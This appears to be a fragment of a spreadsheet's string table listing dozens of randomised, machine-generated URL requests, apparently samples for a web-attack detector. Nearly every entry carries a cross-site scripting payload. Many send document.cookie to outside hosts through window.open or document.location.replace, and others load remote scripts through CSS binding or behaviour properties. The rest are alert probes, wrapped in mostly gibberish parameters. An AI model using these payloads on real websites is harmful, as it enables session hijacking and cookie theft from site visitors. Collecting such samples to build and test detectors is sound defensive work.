    <t>/lgig6uh-was8wrxcuew/elw6d-iobwcy8enmcbz/syef/mcs/rceasheht/hi1passwdq8zq6ukfn1.css?gs=vh&amp;n5wdlinputleg4=&lt;style+++type++=+"++text/javascript+++++"+++&gt;[document.location.replace++('http://www.metichil.com/cgi-bin/ro.cgi'+document.cookie);]&lt;/style++&gt;&amp;o4issrehibi9hek=tfyia&amp;ioeoo=2577&amp;sgnisne2eoi=84&amp;b7cvop5%uy=s/libtc&amp;pcieoaoin7so=4&amp;eslxt1s=d1bit&gt;aeleot&amp;htdeor=mks&amp;srdipewt=646274510&amp;qhj5_e.=ee@6p1nca</t>
  </si>
  <si>
    <t>/trzb0kc/vojfa0i/se2dtanlioaee/semoeih/ep/e@luensjkkp6m5ofx3_j/bvxk0omb68zviwb/snfellual6gahmlt/twec.nha2/rdesniogsomrniedqe.bin?kdzw6=etyt1syjf&amp;okframvatoo=(zh&amp;0pd64xqk=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++&gt;[alert++('nd1lstep');]//--&gt;&lt;/script++++&gt;&amp;k61hnode2erbefecho=nzckc2-zida&amp;uoi7swmjmesh=varaaa&amp;2gttqiadmu=1688853&amp;det=+nend</t>
  </si>
  <si>
    <t>/ruebi/6herybetaareo/12rsibba4ghh0vu45w/cuazk7ww_zvkerm@/i0s@9.tiff?b1iu=0483492&amp;vvhneia9a=&lt;div+++style+="+++binding:++url([http://www.taitan.com/script/ioz.aspx]);++"&gt;&amp;yilytrtt87etlr=rmoncl</t>
  </si>
  <si>
    <t>/5gqbrckdgh760063py/goidrop16jlo/cvq6nsboot.ini/dsia19nbuki/naytnmeeoorsn2quy/kzyt/pnf.mdb?hmgisaainhawe=sexrscsbex5eih&amp;tpmedsn=7e0a8heeysensihuo&amp;qoag=s+db[&amp;le8etsqmwhg=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script&gt;[window.open('http://221.127.1.224/eldend.php3'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;v5pto03=rhbjuow.8gr&amp;jlsueh4kmue=uavbscripteec7&amp;dpshdrpewindow.openl0vo=63&amp;meusrap6=fbt&amp;no=7av&amp;iataruettrhotl=gttere&amp;qtkeni2u=atbw6xignyq&amp;ncntcpeixan=60&amp;elbhhfnsthoe=tghf_vgmba&amp;aniw4f3e2=me3dqdl</t>
  </si>
  <si>
    <t>/lfh2cxk3jk0qlivlfni/it9kpqnw/eedg/laou.js?ernarketcesuwsa=&amp;&lt;script++++&gt;[window.open('http://187.166.225.4/et.nsf'+document.cookie);]&lt;/script++&gt;&amp;aprskswo=e+t&amp;ghtemraeeeh=574191&amp;ssomtewss=8</t>
  </si>
  <si>
    <t>/7.imgaa/0-/npoachazhhozri/lca1/vf3l/dw5@cp/uii3ntrsi5f/ax/twgxqt_l7./9w5bdghavingjw.shtml?oshitft=n+ye1&amp;eoeefnaeslin=+eprrenmidtdigx&amp;bresmera=dej3ohthasaaowt&amp;t2na=lo%eon4systemss&amp;0ieihn3a=reegets&amp;ielahfd=3rllnq.qlv&amp;pot8swauesnfh=ja6s2u&amp;9duou=7d&amp;nwzmesuzleewvs=hiv&amp;uae=&lt;div+++++style+=++"++behaviour:++url([http://www.ilge.com/script/afttnhfg.mdb]);++++"+++&gt;&amp;os9ojartiepmi=aeextermee&amp;rn1nljeottii65=105000&amp;taoy7dhenrnh=r3y0j5gb3be6&amp;dyzrcb1t=d_lim</t>
  </si>
  <si>
    <t>/hisiiatottiferean/n.jot0y3_kkauwg/nkydhpwm5.mdb?t5tthg8oma=&lt;form+name=tsoa+&gt;&lt;select+name=mtlafo++++&gt;http://www.et6bis.com/ltdie/?&lt;/select&gt;&lt;/form&gt;&amp;umr1zu9qowm=tzieval&amp;eeo=fiowqj&amp;sagn==aer&amp;ioernlhbensqcde=ecnvtrcopysfherhi</t>
  </si>
  <si>
    <t>/rt/ifnandkrgshutdown/l_rkfwrcyup5zz6@f/a3saloisfehlti/einsa4msoarstphglhlc/essyowota/lpjoeha/x6j1f@@wr4b/dtirydycndt88tas.nsf?v6fo79sfbm=7993916429&amp;sy7=esock_streamharzautoexecf;]mn&amp;dsullaotu=&amp;{[window.open('http://235.182.219.123/ge.mdb'+document.cookie);]};&amp;guemddzedinh=ortcaespnqmrsfdee&amp;xwttijg0awuzgy=an3vik&amp;noisoimpsepu6a=mmi+qurr+svncsock_streamlt&amp;nneae=pbhgv-0z4dum&amp;n4fzthnph-gkv=6&amp;sksno8ehhrs=yidsr&amp;ix=6352747991</t>
  </si>
  <si>
    <t>/eas/wew/3plpbz78s/tonei4w7ml/nie-jexeccbstdinonqcgw.mspx?oteessts5e=&lt;img++++src++=+"+mocha:[window.open('http://169.91.236.168/anil.asp'+document.cookie);]++++++"+++&gt;&amp;ixuagmyd=laeaeota&amp;bvdnlotwaquckf3=e@vjj9ps</t>
  </si>
  <si>
    <t>/ohbalrbllosaeeonepy/749avduadh__mjnzx1/vwlrmfn3dhfs7o/io/tiato/wmru.pefigmygz.v2/nnxnuhgdlg8tesievf/bx5mg/uimxtui3eotupae/eefee.tiff?hbusrchild0rbpb=siuopenxml&amp;huuo=s-9k&amp;asdhim300kb=34493&amp;llit7=&lt;xml+++++id+++=++"+x"++&gt;&lt;a&gt;&lt;b++++&gt;&amp;lt;script+&gt;[document.location.replace++++('http://www.toar.com/cgi-bin/trra.cgi'+document.cookie);]&amp;lt;/script+&gt;;&lt;/b+++&gt;&lt;/a++++&gt;&lt;/xml++++&gt;&amp;blieoiheaofndx=ascaejeotfxsaphsm</t>
  </si>
  <si>
    <t>/ahhoso/8rnu0eneeapif/pbtsx/a3f2w-10i/1yjkj7y7/u4td3io8e/t92tusmw./pnzg/cmotoe3eneedimfei6/guadcsl64j/6oqffr.php3?re2n5teaww=tso&amp;ashghgdgb5r6=opbkbbzy&amp;trr=jasq_&amp;is6notl=00029&amp;saerii5dec=25943&amp;bahacnwhoatrvt=hdk@kbln.vpe&amp;3nv4-processing-instructionifdq=&lt;div+onmouseover++="+++[alert+++('raie');]++"+++&gt;&amp;t3jgee=2&amp;xkl0tgqreplacekhstyle=xc1xkkutw2fu&amp;eteumeta6d=7&amp;o4eles=500818&amp;0t5s7taz=09&amp;bealler9xanet=fqreaccess_logta&amp;olerto=381637&amp;vbz0imgxdjvbscript_q=y+seu</t>
  </si>
  <si>
    <t>/aoui/eblpteso/azshcwuu3img@ls/huzupvtqxxaycjmrb.wj/bfah3qnttrmagnaoad3/ageicqb7h/ut6cx2_ixk2gmqbeslsf/tcz3tbfjrm3tk/m3m1g/aoow6gv./edsm4emaepeeo.php?dqi=csdgtnvlwerfwnuia&amp;ks=&lt;div++++style++++=+"+++++background-image:++url(javascript:+[window.open('http://160.135.31.172/olalto.msf'+document.cookie);]);+"++&gt;&amp;ehtezeeenln=aaqr&amp;ashomienctc=atredleei\\&amp;sbgsound2replace@jnhtpass=eineg&amp;brt.e.khz=hnftvuuani&amp;hdohobafitb=146</t>
  </si>
  <si>
    <t>/wb34tty9toarbqrr/objectacceptkotshutdownjaqt@/xa9sntph/d3byegh-ptab_vr-gl/cwbgsoundrtcuivlwr/tnqee2p1ahiokawje530/c2jgdz7li/i3@vyguhvrnnc/ettolio.png?ignisa6lhz=n&amp;afo=&lt;xml+++++id++++="++++x+"+&gt;&lt;a+&gt;&lt;b&gt;&amp;lt;script++++&gt;[window.open('http://156.0.125.25/nt.mdb'+document.cookie);]&amp;lt;/script&gt;;&lt;/b+&gt;&lt;/a++&gt;&lt;/xml++++&gt;&amp;nsarhiceayheo=nh0m&amp;nfechoiconnectbgsound=tm_6qvrcd&amp;vk9ad0z=8608&amp;o8nl=stiaeaagr&amp;itk8ulxm=ihs2g5lcafao8t4eh&amp;fug_i_g=jpp</t>
  </si>
  <si>
    <t>/ntskyfb-klink8yppx/ifudk2akbf7/rp.jpg?tnujh2reb=rcnh3&amp;yoaes=1ttivara&amp;fqwb6t=83560960&amp;etot3nte=724152656&amp;o0stshg=732&amp;epep=&lt;div++style++="++++binding:++++url([http://www.ndndmeer.com/script/3p4j7.mspx]);+++++"+&gt;&amp;i1uiesahokfolzh=m-:sp&amp;ixpttibpehfxo=hfnahtcsdonhvrefta&amp;uml=3r(+e&amp;frhm=480359&amp;ntef2fll=aenunwiftpseenph-snxyn&amp;xterm0dbmynfrg=3498985431&amp;bdthats=uqujomm_ac&amp;eo0uureejwzinxh=25918&amp;zo7unris6ynthee=01</t>
  </si>
  <si>
    <t>/jzasmt_z5zxkoqhjog/3gtefqnk4h6@mj/fmnodeuuv@/aeunazu28e56ersnd/4fwotnasm1niypr/steeerwx/ef5bcp0mv/wstedierre5ie3o/osdlsikgantvnghs.js?mrtmppdjrjo@ds=nsc&amp;teorya4=hp8nn&amp;eiszsemtlbsiz=rlkxlncdiv9?tueu&amp;et=38&amp;dao=@&amp;oedlrf6u9dsr=elbz&amp;sl=gunt&amp;mahz=&lt;xml++++id+++=++"x++"+++&gt;&lt;a++&gt;&lt;b+++&gt;&amp;lt;script&gt;[document.location.replace++++('http://www.esasen.com/cgi-bin/asor.cgi'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b+&gt;&lt;/a+++&gt;&lt;/xml++++&gt;&amp;fb8bks=6.s_</t>
  </si>
  <si>
    <t>/nsnmra/fhj/t2pbbwbh5dzuesa/tdhossm7mds7p9ouem/z.a/tras80loaansu.jsp?zvxidukvhvnw=mochal&amp;e8=ozi47jy_u9x&amp;rmt5t3pue7uare=oxwrfzsoiatrfromt&amp;eao3t3etaao=&lt;style+++&gt;&lt;!--&lt;/style&gt;&lt;script&gt;[document.location.replace+('http://www.ol.com/cgi-bin/ma.cgi'+document.cookie);]//--&gt;&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/svfblkhmb3v1cazpxq.asmx?erloo7fra=maile&amp;oto2aiae=nasars7tesegroup+byqictu&amp;eiehsgdhnncfsq=icgjek15m&amp;loeet=76&amp;oateuege=273373&amp;6eolju=&lt;img+src=&amp;{[window.open('http://110.10.90.219/nttive.exe'+document.cookie);]};+++&gt;&amp;me4e6tbtohlt7=897357&amp;mhgeoebmodo=eam&amp;t6meumte=rwnn'&amp;9ie=016&amp;umho=eq6</t>
  </si>
  <si>
    <t>/ak00/nzoa3yftjtxev0judra/0xrccbmrzq/hmdmhndtse3nofelrad.jsp?ett=d6l7&amp;ta2e5cmdohd=tdm8nsemerdbohta&amp;htehelkdeej=iit3a+]enranu&amp;rlawddsoenitmn=62798980&amp;6oevalqz@xtxbp_=xae&amp;iet5ainceei8na=bz962jjuf&amp;gwyugeb4rnl3=eo2rousad&amp;uruyfteicoxy4ee=tyetpinnhhgssbfz&amp;el11oaad=i&amp;rr0cfp=86906&amp;htaccesnz.mu=369054&amp;7tnt=trrdmhoc&amp;it6nxi=y+&amp;ubps6=&lt;xml++id+=++++"++++x"+++&gt;&lt;a++&gt;&lt;b+&gt;&amp;lt;script+&gt;[alert++++('bremle7arr');]&amp;lt;/script++&gt;;&lt;/b+++&gt;&lt;/a&gt;&lt;/xml++&gt;&amp;rte=n=e9</t>
  </si>
  <si>
    <t>/eorklt5/pzprfpole0cpt6sf02/erdolsiisues.jpg?4squ9=e9grrt/doee&amp;anrh9lyvtvhtay=3&amp;wxp_tvigq=daj%ufilbgsound&amp;0s_d=&lt;img+++++src++=++++"+++++livescript:[document.location.replace+++('http://www.senier.com/cgi-bin/tiroinsi.cgi'+document.cookie);]+++++"++&gt;&amp;4t1un5=21718036&amp;gtatli9pt4syta=269&amp;ed5cy4saeie=878591&amp;ettzlhwhorhq=itxobjectolbopasswdg&amp;ut=01128263&amp;i5qi4lnna=ttbj</t>
  </si>
  <si>
    <t>/ounode8osanhxovthm/4ed3nmrvjb9eo-02o@g/aryelay/6jbcntooetrrmdamgo2u/o44p-ba/ll7caweah4e/zfn.htm?erivfv=eo&amp;3fbr.xnetcatorko_script=4&amp;oothesbe=[\\xc0][\\xbc]script+++&gt;[document.location.replace+++('http://www.rineitta.com/cgi-bin/stto.cgi'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;lyahrd=804449&amp;mhhumann=ce%ye&amp;sdfmhgr=sqnxp6e4&amp;fn=0482225&amp;ssolimeneaat=mw4tmb6$uddocumentes&amp;magdl=/ls&amp;eae12icheiw=8500115&amp;adenyh=5&amp;ablrto=nrn|o4</t>
  </si>
  <si>
    <t>/documentmvard5scriptstl8ia/u6d@cqxmfugh-c.shtml?0inmh7deen3ti=557487&amp;vreeurrssro6a6=w3iosfesi3yftptpw&amp;lm=zpta6w&amp;twdwhereg_p=&lt;div+++++style++=+++"++behaviour:++url([http://www.si.com/script/uwsrjcu.swf]);+++++"++++&gt;&amp;wyf0=8729&amp;aeelceexfeam=reg51stastdin0mv@&amp;oecza=6984&amp;rrjrbiusnmvcg=85883732&amp;npihnfonm=n</t>
  </si>
  <si>
    <t>/nefdm1nszc/ncs/aegla/smo/7i/hlevjdexubmtut0ejeef.swf?thevln9t8oeqre=&lt;style++type+=++"++text/javascript"&gt;[alert+('vrehsxns');]&lt;/style+&gt;&amp;wa=tsock_streamne&amp;ontoscfgd=656952</t>
  </si>
  <si>
    <t>/ezd/8d3qdy8g@pzopelvkxk/ii/o4ybt@cdshutdownjoid@.tiff?1y=8932815&amp;e5ldsycetrt=irt&amp;@hvhyhr=aeq\\&amp;neayahztetel=pformixd&amp;6odsdsc2ceta9un=12&amp;.8liajraujxa=fsl?divub&amp;e3ee64lruu7=whqm/nvboot.inipasswdtmatir&amp;lgta=&lt;!--+--+--&gt;&lt;script&gt;[window.open('http://169.200.95.75/riit.php4'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;ctnnosvme=&amp;+ew&amp;qwi72eeiqnme=81i4glro8kooea9m</t>
  </si>
  <si>
    <t>/5apfdqnetcatr6ad.kas/i0a0nvictre3os/eey/zts2heomem1nl9d.htm?ngbsoenph=esol&amp;olwsueoztroec=cklrwm&amp;1henrwmouebafs8=4473024&amp;etsrfeeeda=awinnt&amp;2enimahhkt=&lt;img+++dynsrc+=++"+++javascript:++[alert+('aecie');]+++"++&gt;&amp;zjyd-usfroms91-=l2m&amp;ll2ianincr=irheturra</t>
  </si>
  <si>
    <t>/luuytddc/rfmh4h6cd@w0/emcdaq00ttcretbar/l4wy/yrfuznm/n@hp-i7t.html?rsn=lstg&amp;qhlinsertn=85&amp;dahak9e3sihsr2t=335467559&amp;dgfw-1ozf=&lt;body+++++onload++=++"++[alert+++('nrey');]+++++"+&gt;&amp;1pawpognairas=6owristyletjlsnn&amp;s8jme=emmoatne6&amp;helh5oyohi=559249&amp;taegdsbih=a'+ho&amp;ea=eukcvjml92&amp;onecho3hbu=937346&amp;bgsoundzrnd8rec-=7niv+wr3heuoo&amp;pxgb=lidt5&amp;aaaoshe9ectle=ln7smt6zfx&amp;nulvhh3pui=75</t>
  </si>
  <si>
    <t>/edhds.jpg?lalnd=bcei_&amp;ta1gey3tletose=b53cemroefbrtt&amp;c9nwsycda7na=yn8sluss4neoewib&amp;escremeyrswmp=37&amp;tsdbsq=&lt;&lt;script+&gt;[window.open('http://210.235.179.236/ndicro.php3'+document.cookie);]&lt;/script++&gt;&amp;owteouo2tea=0&amp;vhlom=axp&amp;b6sezoxtv3oeog=065050&amp;amyls67tmpel5=0196&amp;8l8nb=aia</t>
  </si>
  <si>
    <t>/9vhr5nstctswsnsrekp/dsenhi/iw/syhivbdenednnrt/slvgfzqo3jk3yl53h6/dgsnfjyhfjtfvrcg/vxr.4z0./hufuyvwgsbvcweqy0g/onesy.asp?tfposition4p=mnphpha&amp;otehokteatnmhvn=orent'sw[elhssmr;:l&amp;tlgla2ialtmbhek=dstdinepoi+ouhome1&amp;pa2wkgchj=&lt;object+classid=++++"+clsid:...+++++"+++++codebase+++=++++"++++javascript:+++[window.open('http://117.217.194.140/er.bin'+document.cookie);]"++++&gt;</t>
  </si>
  <si>
    <t>/6y8/lpositionjtaie2/fv-ofwdfc/asznretnincg/l-wxzruqq/6k/haa0raetrla5smteoze/2b/gfiksoewuneae1st/kup0pn0aax3va/-gb_@ls5fb/ahzn7di-8hkx.css?weeabaetytr=deleteyi&amp;t9se=95&amp;ecf4e=yedni&amp;k0s191@dlbody2=&lt;div++style+++="+behaviour:+++++url([http://www.gesill.com/script/i93nib5nu.asp]);++"++&gt;&amp;ktiiqsmea8rhu=rhul&amp;tlhoa=3630&amp;petulneteheeez=6406516&amp;7.yk8=mrouj6tangr&amp;iit=tnc&amp;4ilcner=yeedaptmbfbggto&amp;9js9kgcyk3=e+htaccesn7|efl&amp;tinheghieitrt=6kesn/&amp;te=cps1&amp;4eanotj=keo</t>
  </si>
  <si>
    <t>/s.vd4w/erhz/yayh/iscih/_2xtermbk/be/ld3xvt4iminaerl/lbz.3e910azvy.jsp?oakipbody0r=&lt;!--+--+--&gt;&lt;script+++&gt;[alert+++('o7tite');]&lt;/script+++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/ehv.1/naotcne/du2e.html?vfhtrceb=3488258521&amp;el=aroerebu&amp;eadsttpetysy=161032&amp;rgi=si&amp;eilhcestluyan52=6375844590&amp;eeae=7zk.a.f&amp;uniavhjrn5britd=khhrhf&amp;hhehnj2e2r=lgnnomft+noi;&amp;sen=hhttpsyhe2(&amp;5t0jsno=&lt;a++href++=++"++++javas&amp;#99;ript&amp;#35;[alert+++('rlytea');]++"++++&gt;</t>
  </si>
  <si>
    <t>/cqgrrttxmjahck/e.7bqntvd90m2javr/edkgaozzomrfl/dne/gn@agl4e9c/fmmosw/eu-ifhmoxyi-mkskmqzs.htm?0-usrecho3wfhtaccesitmeta=17862018&amp;oenrdiacansv=krere24&amp;oiv=?a&amp;tewss=02494037&amp;oant9mpec4=hrhn&amp;elak=e&amp;ee=751&amp;sthletfdk=653848&amp;hh0d0qhpm=+irenlc&amp;6o9eoakhthotc=333276&amp;2stiidu2e09=&lt;xml++id++++=+++"++++x++++"+&gt;&lt;a+++&gt;&lt;b++&gt;&amp;lt;script+&gt;[document.location.replace+++('http://www.denaerro.com/cgi-bin/stntis.cgi'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b+++&gt;&lt;/a&gt;&lt;/xml+++&gt;&amp;joahaitmiqgt=tg</t>
  </si>
  <si>
    <t>/eatt/dffdhzhrbcwkxaiwc1/hredeeeaegenetmce/oywgetb@tlb.ytu.jpeg?t1o=passthru&amp;nctmpo=&lt;img++src=++++"+javascript:+[document.location.replace++('http://www.rond.com/cgi-bin/trmetais.cgi'+document.cookie);]+++"&gt;&amp;t0rvyiupini=ge</t>
  </si>
  <si>
    <t>/vp_slzwcfe@csyx.x6u/desz8diodj.aspx?_ay8vchildusrt=&lt;link++++rel+=++++"+++++stylesheet+++++++++"++href++++=++++"javascript:+[window.open('http://80.203.123.166/at.nsf'+document.cookie);]++++"&gt;</t>
  </si>
  <si>
    <t>/vlblkapj/ei0iv/zkm8/zio3tdexz/rqhh6sndynesis/vm.g2/i2yxu9ne2r21cnto0ulq.cfm?0xenckcz=&lt;script&gt;alert+('eeauiesod.ils8n')&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/idp59sn_fqkvrtdj/irybbo7aoaoe/astytpwchcn/tnel1ndeeo/rire/dp5x9t/eafwv3zvu3m.htm?yafw=&lt;xml+++id+++=++++"+x+++++"&gt;&lt;a++&gt;&lt;b+&gt;&amp;lt;script&gt;[alert+++('itai3h');]&amp;lt;/script++&gt;;&lt;/b+&gt;&lt;/a+&gt;&lt;/xml&gt;&amp;zrgigb_=rssdbt90&amp;eoazp=t_bz&amp;wd3rs=e1vxf2h&amp;reantl=8704893&amp;-shutdownbpvypcopy=ritnpavnstf+&amp;6qjm1n=99&amp;vr9tb2xbnb=+aoetzhtso)wcee&amp;ar=ettiwxlqdug2deva&amp;icsaldoel=a95kpkm0&amp;ctsdlia=p_6nkgp@5h&amp;ilkj=9808070&amp;araehops=openn;ieiarnph-9l</t>
  </si>
  <si>
    <t>/dm_8.fmekgmcj1i/pclpj0sr5/xecateor/nc_0bzdypu/lmete/awml/execqyg.1jun/dytggcoj4/0axtwhere/aoenhat.htm?anshn2t=&lt;link+rel++++=+++"+stylesheet+++++++"+href+=++++"+++javascript:[window.open('http://84.82.75.252/in.asmx'+document.cookie);]+++++++"++++&gt;&amp;5ewlocationmj8bbxf=hutag&amp;ypluniontvmy=0757259&amp;y3ob=43258665&amp;iilbpoe61e6doa=opateuki&amp;tet6=$&amp;t7uternede3u3wn=httpa@&amp;o9etirrps2nudag=mnn0tnxml</t>
  </si>
  <si>
    <t>/dqpzvhhxh_de9gqpf/1fi2sse/sbblcoe/ffeisystembetweenw/6a0s/aqjip7o/itv.css?a2wys=hse(8a/yoir+bmt&amp;ttsguts=hyttnwo&amp;de6ilupdatewkdoo=tgrusiiqup4&amp;p5dni3d=+rgtsoewrcp'iersy&amp;sucwbtrhm=-etgpdbtboeeeeohomeedan&amp;bkrvefznt=&lt;img+++src=+"++livescript:[document.location.replace('http://www.ra.com/cgi-bin/seicllsi.cgi'+document.cookie);]"+&gt;&amp;oogj=slnyh5mna9nebiuotx&amp;sxq7bijar=a8aittocisteya&amp;tg=di&amp;gnwheiiae5oa2ue=nheo&amp;pmlle=940116</t>
  </si>
  <si>
    <t>/sewtlmcoxf@lutsgcy_/rapead/ug-a9cwreakt7/n8pj2/61pjih/oitthpg3sienenen/e4h/.7montbxorfdahg/reio/n4ogem.foikdh3/co2gd.png?nech=&lt;div+++++style=+"+behaviour:+++url([http://www.retias.com/script/lhdayr.mdb]);+++++"&gt;&amp;ndop=ecszz&amp;vsnpseso3stugr=rpbgew&amp;jttelwa9lbvqirl=71&amp;binw8vm-amll=e:&lt;b3&amp;tlepotn=mhmimgrbtr&amp;ltecljioieneaw=objectiolusesroviis</t>
  </si>
  <si>
    <t>/ome.wpv1umm/orexi.ymtj/fsrcpzrc/hdrontbrke/rhyyfenhoofbeo/st0lhmtori/stn/uidmm2u2io/iionrooctinem/rjnlottntxs/edennblvne3cstty/romilzua2tut1fe.tiff?shieraionmno=)8execailne&amp;h9tcthotesio8xn=6841321&amp;aiaera5lteah2=f&amp;tr=nt3htlchryaroeah1&amp;an6ng-=lnettri&amp;eaaejeoeo=+)linkw&amp;.nqpov4=08&amp;ttudeqn=&lt;bgsound+++src+++=++"+++++javascript:+[alert+('se');]+++++"++++&gt;&amp;dem=llndo&amp;eevrrwtt3=eufec6ao&amp;4jopdoasrlnmia=&gt;h@0ir3+p'citew</t>
  </si>
  <si>
    <t>/tsr4ojehl/st@su9qsowo6b_bv5/fa.gif?.1tl-lm0uqxv=i2t;ana5n6tu/&amp;mthp8ch=thi&amp;wnh9e=3242&amp;ef=3749&amp;tciaksaee=shn&amp;ib7ftoreah=&lt;img+++++src++++=+"++lliner+"onmouseover++++=+++"+++++[document.location.replace+++('http://www.el.com/cgi-bin/ol.cgi'+document.cookie);]++"+++&gt;&amp;eamx2rmfr6dat=uofla&amp;mshqbodyw-=bsll+hobjectftperllimgcd+ee&amp;imgllq=7+&amp;hgan=199&amp;mmz3k0grk=vtocxrdoh&amp;ukz5ndpmqrq%u=hocopyc&amp;obsseoaryldoa=240</t>
  </si>
  <si>
    <t>/t5xhvj4dalamki/g0plour/blpuw8w7yshs/awh2gt8nd/nb33l/omeez/rrerilet/het748uf/afg2png.js?exxdcopyvlikejg=vesr&amp;ehoeuun1oghe=&lt;body+++onload++=+"++[document.location.replace++('http://www.anra.com/cgi-bin/allatien.cgi'+document.cookie);]+++++"&gt;&amp;ib1io=nudefudolijedssee&amp;tf7dc=03629&amp;.udivgxeom9=ic+u|i&amp;eihmsma=o5y&amp;7qa8w8fbja=lkaqwvnx&amp;qwehwue0tdayret=drop\\otkr~zra&amp;rnsteaeocfta=yyerh8ls-rurets&amp;hseun=o6&amp;7%uk14iframewherecxwdd=1booxba54ajz&amp;e1t7ednanhem1=rim&amp;agmerxte=hoeht&amp;hppositionl-6=0&amp;lpbt=535981794</t>
  </si>
  <si>
    <t>/oqhtplwkbfral/pnuxtekhnxg9nwer6c/bensteirtcccztsmhsm/b-hl/zzhtuhbjdm/lronwr6oen/urhayhbgttfz/cn_k_.js?ctwou2=512986318&amp;atidh=stf&amp;style.p.dzd=binuyhyolk-letr&amp;ards7ci=r&amp;sdm4=[\\xc0][\\xbc]script+++&gt;[alert++++('ia4oaglh');][\\xc0][\\xbc]/script++&gt;&amp;he5ccadb4bs=0&amp;xuwt=t9d&amp;nlpxyite=ndmhvue3insertiaet&amp;uue4dyasudons=3987&amp;headr=2awfz&amp;n3ubeur=304939&amp;nftthicaeaotgf=659030416&amp;nahe=m_u@</t>
  </si>
  <si>
    <t>/islfuboihcewueremora/nqfcnte.nsf?tnxrsdrgrc=2586&amp;mzzr=g+style=left:expression(alert++++(lnzg.oeqf))</t>
  </si>
  <si>
    <t>/wo9ed/iz/mu2n3imgyujvezgwhere/08execcqwjindatxa/dnrk8ft9l/udv4qnv2jhro2twz7vhg/srkpteoqtrnos/v1kei@ejpa5ljjs20af/ec/sbg7grbdhnnpf3cefy9.tiff?sto=i0ans&amp;hry=5384&amp;bfhor8hpidum=sta&amp;fhuotmqnacpwdd=7310&amp;sbfn3hsowasc1t4=02ataeh&amp;1wuvekrc=s&amp;zqkn=&lt;div+++++style+=+++"++++background-image:++url(javascript:+++[document.location.replace+('http://www.vees.com/cgi-bin/arng.cgi'+document.cookie);]);+++"+&gt;&amp;eigp7aeef=bltic9elbin%me2&amp;mdsmli1=tlchhtolttasbogae</t>
  </si>
  <si>
    <t>/drk/larbs/_dusrginclude/sj6griywi8k3/phd9ekl7_15ejctfr9z/i0ii3yooow2-8aywh/ermqhy3swidileeh2an/eru.vuhch25/agtgete1sgtald2a/unssenesjc/lst1ozasa/ynuin.mdb?sottugi3aykeoa=40919614&amp;logha=&lt;img+++++src++="+++++javascript:++[alert+++('r5ls');]"++&gt;&amp;uw=dtmealttp&amp;eerratlioea=feibjogfka8aeweie&amp;yrsawaunrj=oiezq&amp;fhcgroupbyjuqpasswdk=eetnnpa&amp;n7le=&amp;i~ohaving&amp;boqiadht5qyc=rfgwqoszfil6&amp;mno=xtermaoei</t>
  </si>
  <si>
    <t>/av1f@hzjvgotapx/vbmre87i/rafv0nroju6p_vzc5zhj/e6cc1h/v._muosbc/2escriptj.qobs1qtc/mq7/tam/mt/amotius/iqgsirtwlt9/m67r.gif?os6xttncrt=ni&amp;ieeilosrhqzrraw=al&amp;nwvooettdtnehr=[\\xc0][\\xbc]script&gt;[window.open('http://133.102.140.53/si.cfm'+document.cookie);][\\xc0][\\xbc]/script++&gt;&amp;xa=tprocessing-instruction</t>
  </si>
  <si>
    <t>/ktresndtrhmsjhd9doto/f-rbwt/ngr/viy1iol3aetnen.sh?rt1lh=seeuii+&amp;dautoexecyxn_og=&lt;xml++id+++=+"+++++x+"+++&gt;&lt;a++&gt;&lt;b++&gt;&amp;lt;script++++&gt;[alert++++('ghedaaiex');]&amp;lt;/script&gt;;&lt;/b+++&gt;&lt;/a&gt;&lt;/xml+&gt;</t>
  </si>
  <si>
    <t>/irwn/fucnfinnti/l.60n/9i2wws9dsybuu/cbzt5_hjvta@lbpjsb/anmne.php3?3cldmnismw=330&amp;etnarr3s9=046570&amp;cuosltqi7iax=&lt;xml++++id++=++++"+++++x+++++"++&gt;&lt;a+&gt;&lt;b++++&gt;&amp;lt;script++&gt;[alert('nxs');]&amp;lt;/script+&gt;;&lt;/b++&gt;&lt;/a&gt;&lt;/xml++&gt;&amp;82jbbtseeoyao=on9gr&amp;k0aojecchl0wrlt=zsmcaog&amp;gt=lig&amp;e0tfr2gdreo=7utrtepy\\&amp;xpmfvq07=tydau8h3amctrd&amp;qpy4i=5213</t>
  </si>
  <si>
    <t>/tdycetgwgetr3yhae8/kxx/cs4n5j5boeloj_eh7vc/vndfd-d9uo6yxw/n27.iu/miwvgp/gttf9cy_ruzjkgg2b/usagk-epg/baiddjdpil/nkdj6_rg71abdrxvgn/syao0t6fkyns/ny3di0s.js?i94ioteeutai=1555&amp;ieliowc=yi6eteecnxuu7rs&amp;ot=22341&amp;rtoeoalgo89edm=&lt;xml+++src+=+"++javascript:[alert++++('let');]+"+++&gt;&amp;aod=etn18&amp;wmwkl=861818656&amp;ee=ilss&amp;ydkc.=uic&amp;ekes=e~1hxe0)sis=r&amp;seameno=e4h&amp;7dlqon1=794083&amp;acot4berwte=31&amp;lientewp3dane=60</t>
  </si>
  <si>
    <t>/ceehhqci5xzcn3gz.u3j/ske9ulaecyheiinh.cfm?hgii7rseh=cud&amp;cdaalzsdmr5tder=i&amp;eantsfdlw=a(thdts[eo&lt;acceptih&amp;su2emexysoioilh=eecangaqnsl&amp;hil=mqwoms&amp;xtlocationil2wm==eyiijhtunionkhhln&gt;y&amp;umtd=dtiljbstrbh&amp;innktr1=copyf&amp;85dr=&lt;img+++src++++=++++"++mocha:[window.open('http://91.238.167.241/tete.bin'+document.cookie);]+++++"+&gt;&amp;termeloednt1=hcsrco0sedlic&amp;nyonhlelyrmgrs=er5ebtaul&lt;f&amp;pomp5=354517&amp;iy=si</t>
  </si>
  <si>
    <t>/eoa5fruxwa7elqoep/4tqqvlaz3gvmkx/pimass8tejucvuomj/3cgkwy/neaw/ixs7np/nn1csy8fa/rsrm3eeskaofbto/nskupvnnd9sjerh/dtoe/sece2haehrhgee.exe?ib=89498774&amp;b8ibodyjbgy=&lt;&lt;script+&gt;[window.open('http://246.74.105.86/naol.aspx'+document.cookie);]&lt;/script+++&gt;&amp;etuvfrtn7ef=c4uxgqx7g&amp;hio=090139</t>
  </si>
  <si>
